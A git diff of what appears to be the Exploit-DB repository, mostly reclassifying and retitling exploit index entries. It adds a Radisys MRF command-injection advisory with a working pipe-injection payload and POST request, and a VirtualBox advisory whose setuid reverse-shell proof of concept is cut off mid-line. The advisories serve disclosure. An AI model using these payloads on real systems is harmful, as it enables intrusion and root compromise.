Remote Buffer Overflow",2007-12-18,shinnai,windows,remote,0 4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - (ulang) Remote Command Execution",2007-12-18,rgod,windows,remote,0 -4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128 +4754,platforms/win_x86/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",win_x86,remote,3128 4760,platforms/windows/remote/4760.txt,"Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0 4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Command Execution",2007-12-21,eliteboy,multiple,remote,25 4784,platforms/windows/remote/4784.pl,"BadBlue 2.72 - PassThru Remote Buffer Overflow",2007-12-24,"Jacopo Cervini",windows,remote,80 @@ -9671,7 +9673,7 @@ id,file,description,date,author,platform,type,port 5052,platforms/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid - 'AddBitmap()' ActiveX Buffer Overflow",2008-02-03,Elazar,windows,remote,0 5069,platforms/windows/remote/5069.pl,"dBpowerAMP Audio Player Release 2 - '.m3u' Buffer Overflow",2008-02-06,securfrog,windows,remote,0 5078,platforms/windows/remote/5078.htm,"Backup Exec System Recovery Manager 7.0.1 - Arbitrary File Upload",2008-02-07,titon,windows,remote,0 -5079,platforms/windows/remote/5079.c,"SapLPD 6.28 (Windows x86) - Remote Buffer Overflow",2008-02-07,BackBone,windows,remote,515 +5079,platforms/win_x86/remote/5079.c,"SapLPD 6.28 (Windows x86) - Remote Buffer Overflow",2008-02-07,BackBone,win_x86,remote,515 5087,platforms/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module - Remote Buffer Overflow",2008-02-09,rgod,windows,remote,0 5100,platforms/windows/remote/5100.html,"ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow",2008-02-10,Elazar,windows,remote,0 5102,platforms/windows/remote/5102.html,"FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow",2008-02-12,"MC Group Ltd.",windows,remote,0 @@ -9703,12 +9705,12 @@ id,file,description,date,author,platform,type,port 5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G Firmware 1.00.9 - Security Bypass Vulnerabilities (1)",2008-03-26,meathive,hardware,remote,0 5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow",2008-03-26,muts,windows,remote,69 5315,platforms/windows/remote/5315.py,"Quick TFTP Server Pro 2.1 - Remote SEH Overflow",2008-03-26,muts,windows,remote,69 -5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow",2008-03-31,Heretic2,windows,remote,80 +5330,platforms/win_x86/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow",2008-03-31,Heretic2,win_x86,remote,80 5332,platforms/windows/remote/5332.html,"Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution",2008-04-01,Elazar,windows,remote,0 5338,platforms/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite",2008-04-01,shinnai,windows,remote,0 5342,platforms/windows/remote/5342.py,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - OVAS.exe SEH Unauthenticated Overflow",2008-04-02,muts,windows,remote,7510 5366,platforms/solaris/remote/5366.rb,"Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)",2008-04-04,I)ruid,solaris,remote,0 -5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80 +5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80 5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - 'NeffyLauncher.dll' Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0 5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow",2008-04-07,"Patrick Webster",windows,remote,0 @@ -9754,7 +9756,7 @@ id,file,description,date,author,platform,type,port 6045,platforms/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Parameter Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80 6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0 -6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,windows,remote,80 +6100,platforms/win_x86/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,win_x86,remote,80 6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow",2008-07-22,"Guido Landi",windows,remote,0 6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution",2008-07-22,Koshi,windows,remote,0 6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (C)",2008-07-23,r0ut3r,windows,remote,0 @@ -10127,7 +10129,7 @@ id,file,description,date,author,platform,type,port 9966,platforms/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80 33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 9992,platforms/windows/remote/9992.txt,"AOL 9.1 SuperBuddy - ActiveX Control Remote code Execution",2009-10-01,Trotzkista,windows,remote,0 -9993,platforms/multiple/remote/9993.txt,"Apache (mod_perl) - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0 +9993,platforms/multiple/remote/9993.txt,"Apache mod_perl - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0 9994,platforms/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote,0 9995,platforms/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication 'Username' Enumeration",2009-11-09,"D. Matscheko",multiple,remote,0 9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - '.blend' Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0 @@ -10222,7 +10224,7 @@ id,file,description,date,author,platform,type,port 11539,platforms/windows/remote/11539.py,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow",2010-02-22,athleet,windows,remote,0 11615,platforms/win_x86/remote/11615.txt,"Microsoft Internet Explorer 6 / 7 / 8 - 'winhlp32.exe' 'MsgBox()' Remote Code Execution",2010-03-02,"Maurycy Prodeus",win_x86,remote,0 11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow",2010-03-02,"S2 Crew",windows,remote,0 -11650,platforms/windows/remote/11650.c,"Apache 2.2.14 (mod_isapi) - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0 +11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0 11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0 11662,platforms/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Command Execution",2010-03-09,kingcope,multiple,remote,0 11668,platforms/windows/remote/11668.rb,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0 @@ -11169,7 +11171,7 @@ id,file,description,date,author,platform,type,port 17904,platforms/windows/remote/17904.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (Metasploit)",2011-09-29,otoy,windows,remote,0 17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0 17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (Metasploit) (2)",2011-10-09,Metasploit,windows,remote,0 -17969,platforms/multiple/remote/17969.py,"Apache (mod_proxy) - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0 +17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0 17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - (SVG layout) Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0 @@ -12317,7 +12319,7 @@ id,file,description,date,author,platform,type,port 21662,platforms/windows/remote/21662.txt,"Microsoft Outlook Express 6 - XML File Attachment Script Execution",2002-07-29,http-equiv,windows,remote,0 21663,platforms/linux/remote/21663.c,"Fake Identd 0.9/1.x - Client Query Remote Buffer Overflow",2002-07-25,Jedi/Sector,linux,remote,0 21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0 -21671,platforms/unix/remote/21671.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit (1)",2002-07-30,spabam,unix,remote,80 +21671,platforms/unix/remote/21671.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit",2002-07-30,spabam,unix,remote,80 40347,platforms/unix/remote/40347.txt,"Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit",2002-09-17,"Solar Eclipse",unix,remote,80 21675,platforms/windows/remote/21675.pl,"Trillian 0.x IRC Module - Buffer Overflow",2002-07-31,"John C. Hennessy",windows,remote,0 21677,platforms/solaris/remote/21677.txt,"Sun AnswerBook2 1.x - Unauthorized Administrative Script Access",2002-08-02,ghandi,solaris,remote,0 @@ -13913,7 +13915,7 @@ id,file,description,date,author,platform,type,port 31047,platforms/multiple/remote/31047.txt,"Novemberborn sIFR 2.0.2/3 - 'txt' Parameter Cross-Site Scripting",2008-01-22,"Jan Fry",multiple,remote,0 31050,platforms/multiple/remote/31050.php,"Firebird 2.0.3 Relational Database - 'protocol.cpp' XDR Protocol Remote Memory Corruption",2008-01-28,"Damian Frizza",multiple,remote,0 31051,platforms/linux/remote/31051.txt,"Mozilla Firefox 2.0 - 'chrome://' URI JavaScript File Request Information Disclosure",2008-01-19,"Gerry Eisenhaur",linux,remote,0 -31052,platforms/linux/remote/31052.java,"Apache 2.2.6 (mod_negotiation) - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0 +31052,platforms/linux/remote/31052.java,"Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting",2008-01-22,"Stefano Di Paola",linux,remote,0 31053,platforms/php/remote/31053.php,"PHP 5.2.5 - cURL 'safe mode' Security Bypass",2008-01-23,"Maksymilian Arciemowicz",php,remote,0 31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0 40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111 @@ -14731,7 +14733,7 @@ id,file,description,date,author,platform,type,port 36318,platforms/windows/remote/36318.txt,"Jetty Web Server - Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0 36319,platforms/windows/remote/36319.txt,"GoAhead WebServer 2.5 - 'goform/formTest' Multiple Cross-Site Scripting Vulnerabilities",2011-11-18,"Prabhu S Angadi",windows,remote,0 36337,platforms/linux/remote/36337.py,"ElasticSearch - Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200 -36352,platforms/linux/remote/36352.txt,"Apache 7.0.x (mod_proxy) - Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote,0 +36352,platforms/linux/remote/36352.txt,"Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote,0 36360,platforms/windows/remote/36360.rb,"Adobe Flash Player - ByteArray UncompressViaZlibVariant Use-After-Free (Metasploit)",2015-03-12,Metasploit,windows,remote,0 36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload / Code Execution",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0 36376,platforms/windows/remote/36376.txt,"Oxide WebServer - Directory Traversal",2011-11-29,demonalex,windows,remote,0 @@ -14774,7 +14776,7 @@ id,file,description,date,author,platform,type,port 36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36652,platforms/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution (PoC)",2015-04-06,"Jay Turla",multiple,remote,6667 36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 - Arbitrary File Upload / Execution (Metasploit)",2015-04-06,Metasploit,jsp,remote,8080 -36663,platforms/linux/remote/36663.txt,"Apache 2.2.15 (mod_proxy) - Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0 +36663,platforms/linux/remote/36663.txt,"Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0 36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products - Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0 36679,platforms/windows/remote/36679.rb,"SolarWinds Firewall Security Manager 6.6.5 - Client Session Handling (Metasploit)",2015-04-08,Metasploit,windows,remote,0 36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products - Remote Security Bypass",2012-02-10,console-cowboys,hardware,remote,0 @@ -15063,7 +15065,7 @@ id,file,description,date,author,platform,type,port 39186,platforms/multiple/remote/39186.pl,"UPS Web/SNMP-Manager CS121 - Authentication Bypass",2014-05-15,jkmac,multiple,remote,0 39194,platforms/hardware/remote/39194.txt,"AVM FRITZ!Box < 6.30 - Buffer Overflow",2016-01-07,"RedTeam Pentesting",hardware,remote,0 39195,platforms/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",hardware,remote,0 -39196,platforms/linux/remote/39196.py,"Apache (mod_wsgi) - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0 +39196,platforms/linux/remote/39196.py,"Apache mod_wsgi - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote,0 39205,platforms/multiple/remote/39205.txt,"Castor Library - XML External Entity Information Disclosure",2014-05-27,"Ron Gutierrez",multiple,remote,0 39209,platforms/hardware/remote/39209.txt,"Huawei E303 Router - Cross-Site Request Forgery",2014-05-30,"Benjamin Daniel Mussler",hardware,remote,0 39215,platforms/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command SEH Overflow",2016-01-11,TOMIWA,windows,remote,21 @@ -16057,7 +16059,7 @@ id,file,description,date,author,platform,type,port 1361,platforms/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Commands Execution Exploit (C)",2005-12-07,unitedasia,php,webapps,0 1363,platforms/php/webapps/1363.php,"Website Baker 2.6.0 - Login Bypass / Remote Code Execution",2005-12-08,rgod,php,webapps,0 1364,platforms/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,php,webapps,0 -1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Exploit",2005-12-10,rgod,php,webapps,0 +1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution",2005-12-10,rgod,php,webapps,0 1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution",2005-12-12,rgod,php,webapps,0 1373,platforms/php/webapps/1373.php,"Limbo 1.0.4.2 - _SERVER[REMOTE_ADDR] Overwrite Remote Exploit",2005-12-14,rgod,php,webapps,0 1379,platforms/php/webapps/1379.php,"PHPGedView 3.3.7 - Arbitrary Remote Code Execution",2005-12-20,rgod,php,webapps,0 @@ -17056,7 +17058,7 @@ id,file,description,date,author,platform,type,port 2862,platforms/php/webapps/2862.txt,"P-News 2.0 - 'user.txt' Remote Password Disclosure",2006-11-28,Lu7k,php,webapps,0 2863,platforms/php/webapps/2863.php,"kubix 0.7 - Multiple Vulnerabilities",2006-11-29,BlackHawk,php,webapps,0 2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 < 1.9b - 'import-mt.php' Remote File Inclusion",2006-11-29,tarkus,php,webapps,0 -2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0 +2867,platforms/php/webapps/2867.php,"phpGraphy 0.9.12 - Privilege Escalation / Commands Execution",2006-11-30,rgod,php,webapps,0 2869,platforms/php/webapps/2869.php,"S9Y Serendipity 1.0.3 - 'comment.php' Local File Inclusion",2006-11-30,Kacper,php,webapps,0 2871,platforms/php/webapps/2871.txt,"LDU 8.x - 'polls.php' SQL Injection",2006-11-30,ajann,php,webapps,0 2876,platforms/php/webapps/2876.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - Arbitrary File Upload",2006-12-01,"Tim Weber",php,webapps,0 @@ -22479,7 +22481,7 @@ id,file,description,date,author,platform,type,port 11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion",2010-02-13,ViRuSMaN,php,webapps,0 11440,platforms/php/webapps/11440.txt,"InterTech Co 1.0 - SQL Injection",2010-02-13,Red-D3v1L,php,webapps,0 11441,platforms/php/webapps/11441.txt,"WordPress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0 -11442,platforms/php/webapps/11442.txt,"PEAR 1.9.0 - Multiple Remote File Inclusion",2010-02-14,eidelweiss,php,webapps,0 +11442,platforms/php/webapps/11442.txt,"PHP PEAR 1.9.0 - Multiple Remote File Inclusion",2010-02-14,eidelweiss,php,webapps,0 11443,platforms/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,php,webapps,0 11444,platforms/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQL Injection",2010-02-14,Thibow,php,webapps,0 11445,platforms/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,php,webapps,0 @@ -37102,7 +37104,7 @@ id,file,description,date,author,platform,type,port 41155,platforms/php/webapps/41155.txt,"Movie Portal Script 7.36 - Multiple Vulnerabilities",2017-01-25,"Marc Castejon",php,webapps,0 41156,platforms/php/webapps/41156.py,"Joomla! < 2.5.2 - Admin Creation",2017-01-20,"Charles Fol",php,webapps,0 41157,platforms/php/webapps/41157.py,"Joomla! < 3.6.4 - Admin TakeOver",2017-01-20,"Charles Fol",php,webapps,0 -41159,platforms/php/webapps/41159.txt,"Pear HTTP_Upload 1.0.0b3 - Arbitrary File Upload",2017-01-26,hyp3rlinx,php,webapps,0 +41159,platforms/php/webapps/41159.txt,"PHP PEAR HTTP_Upload 1.0.0b3 - Arbitrary File Upload",2017-01-26,hyp3rlinx,php,webapps,0 41166,platforms/php/webapps/41166.txt,"KB Affiliate Referral Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0 41167,platforms/php/webapps/41167.txt,"KB Login Authentication Script 1.1 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0 41168,platforms/php/webapps/41168.txt,"KB Messages PHP Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0 @@ -37112,7 +37114,25 @@ id,file,description,date,author,platform,type,port 41175,platforms/hardware/webapps/41175.txt,"Polycom VVX Web Interface - Change Admin Password",2017-01-26,"Mike Brown",hardware,webapps,0 41177,platforms/php/webapps/41177.txt,"My Photo Gallery 1.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0 41178,platforms/php/webapps/41178.txt,"Maian Weblog 4.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0 +41179,platforms/cgi/webapps/41179.txt,"Radisys MRF - Command Injection",2017-01-27,"Filippos Mastrogiannis",cgi,webapps,0 41180,platforms/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2017-01-27,"Lenon Leite",php,webapps,0 41181,platforms/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0 41182,platforms/php/webapps/41182.txt,"WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0 41184,platforms/php/webapps/41184.txt,"TrueConf Server 4.3.7 - Multiple Vulnerabilities",2017-01-29,LiquidWorm,php,webapps,0 +41185,platforms/php/webapps/41185.txt,"PHP PEAR 1.10.1 - Arbitrary File Download",2017-01-30,hyp3rlinx,php,webapps,0 +41186,platforms/php/webapps/41186.txt,"Caregiver Script 2.57 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 +41187,platforms/php/webapps/41187.txt,"Auction Script 6.49 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 +41188,platforms/php/webapps/41188.txt,"Itech B2B Script 4.28 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 +41189,platforms/php/webapps/41189.txt,"Itech Classifieds Script 7.27 - 'scat' Parameter SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 +41190,platforms/php/webapps/41190.txt,"Itech Dating Script 3.26 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 +41191,platforms/php/webapps/41191.txt,"Itech Freelancer Script 5.13 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 +41193,platforms/php/webapps/41193.txt,"Itech Multi Vendor Script 6.49 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 +41194,platforms/php/webapps/41194.txt,"Itech News Portal Script 6.28 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 +41195,platforms/php/webapps/41195.txt,"Itech Real Estate Script 3.12 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 +41197,platforms/php/webapps/41197.txt,"PHP Product Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0 +41198,platforms/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0 +41199,platforms/php/webapps/41199.txt,"Video Sharing Script 4.94 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0 +41200,platforms/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",php,webapps,0 +41201,platforms/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - 'pid' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0 +41202,platforms/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0 +41203,platforms/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/cgi/remote/40949.rb b/platforms/cgi/remote/40949.rb index 8502f8411..6202b2bc6 100755 --- a/platforms/cgi/remote/40949.rb +++ b/platforms/cgi/remote/40949.rb @@ -1,4 +1,6 @@ # +# Source: https://github.com/pedrib/PoC/blob/2133bc3c0864c332bff7ce1000c83311316ac8ff/exploits/netgearPwn.rb +# # Remote code execution in NETGEAR WNR2000v5 # - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security # Released on 20/12/2016 diff --git a/platforms/cgi/webapps/41179.txt b/platforms/cgi/webapps/41179.txt new file mode 100755 index 000000000..f0c9218cd --- /dev/null +++ b/platforms/cgi/webapps/41179.txt @@ -0,0 +1,78 @@ +Title: MRF Web Panel OS Command Injection +Vendor: Radisys +Vendor Homepage: http://www.radisys.com +Product: MRF Web Panel (SWMS) +Version: 9.0.1 +CVE: CVE-2016-10043 +CWE: CWE-78 +Risk Level: High + +Discovery: Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos + COSMOTE (OTE Group) Information & Network Security + +----------------------------------------------------------------------------------------- + +Vulnerability Details: + +The MRF Web Administration Panel (SWMS) is vulnerable to OS Command Injection +attacks. + +Affected parameter: MSM_MACRO_NAME (POST parameter) +Affected file: ms.cgi (/swms/ms.cgi) +Verified Affected Operation: Show Fatal Error and Log Package Configuration + +It is possible to use the pipe character (|) to inject arbitrary OS commands +and retrieve the output in the application's responses. + + +Proof Of Concept: + +The attacker can login to the web panel as a standard user (non-administrator account) +and inject the POST parameter: MSM_MACRO_NAME with the following +payload: Show_Fatal_Error_Configuration|||a #' |||a #|" |||a # +As a result the attacker receives the result of the command in the application response + +In order to reproduce the vulnerability: + +1. Login to the vulnerable MRF SWMS web panel as a standard user (non-administrator): +https://vulnsite.com/swms + +2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc), set your session id +and send the following POST request in order to retrieve the output of the 'pwd' command: + +POST /swms/ms.cgi HTTP/1.1 +Host: vulnhost +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Referer: https://vulnsite/swms/ms.cgi?MSM_SID=&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 213 + +MSM_SID=&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute + +3. You can see the output of the command 'pwd' in the server response: + +HTTP/1.1 200 OK +Date: Thu, 21 Jul 2016 08:18:43 GMT +Server: Apache +Cache-Control: no-cache +Connection: close +Content-Type: text/html; charset=UTF-8 +Content-Length: 23 + +/var/opt/swms/www/html + + +Vulnerability Impact: + +Application's own data and functionality or the web server can be compromised due +to OS command injection vulnerabilities. It may also be possible to use the server +as a platform for attacks against other systems. + + +Disclaimer: + +The responsible disclosure policy has been followed diff --git a/platforms/lin_x86-64/local/40489.txt b/platforms/linux/local/40489.txt similarity index 100% rename from platforms/lin_x86-64/local/40489.txt rename to platforms/linux/local/40489.txt diff --git a/platforms/linux/local/41196.txt b/platforms/linux/local/41196.txt new file mode 100755 index 000000000..7f3e137dd --- /dev/null +++ b/platforms/linux/local/41196.txt @@ -0,0 +1,192 @@ +== [ Overview ] === + + System affected: VirtualBox + Software-Version: prior to 5.0.32, prior to 5.1.14 + User-Interaction: Required + Impact: A Man-In-The-Middle could infiltrate an +Extension-Pack-Update to gain a root-shell + +=== [ Detailed description ] === + +In my research about update mechanism of open-source software I found +vulnerabilities in Oracle's VirtualBox. It's possible to compromise a +system behind a firewall by infiltrating the updates of Extension-Packs +because of the following flaws: + +1. The Extension-Pack is updated via HTTP instead of HTTPS. The +Extension-Packs are not signed, so a Man-In-The-Middle could send his +own Extension-Pack(with malicious code included) instead of the regular +update to the target. The Code would be executed with user-permissions. +I reported this bug to Oracle but I think someone else discovered and +reported it before. This bug also affects VirtualBox prior to 5.0.32, +prior to 5.1.14. I don't know the CVE. + +2. CVE-2017-3316: There is a privilege escalation bug in the downloader +of VirtualBox. Extension-Packs are tar-archives. Tar-archives can +preserve permissions. A Man-In-The-Middle could include an executable +with setuid-permissions to the Extension-Pack. If the victim downloads +the Ext-pack, it will be stored as owner root and without checking the +permissions of the binaries. This bug affects VirtualBox prior to +5.0.32, prior to 5.1.14 + +=== [ Proof-Of-Concept ] === + +The executeable of the following code is placed in the +Extension-Pack-Archive under linux.amd64/evil with setuid. + +/* evil.c(executable with the reverse-shell) */ +#include + +int main() +{ + setuid(0); + execl("/usr/bin/python","python","-c","import 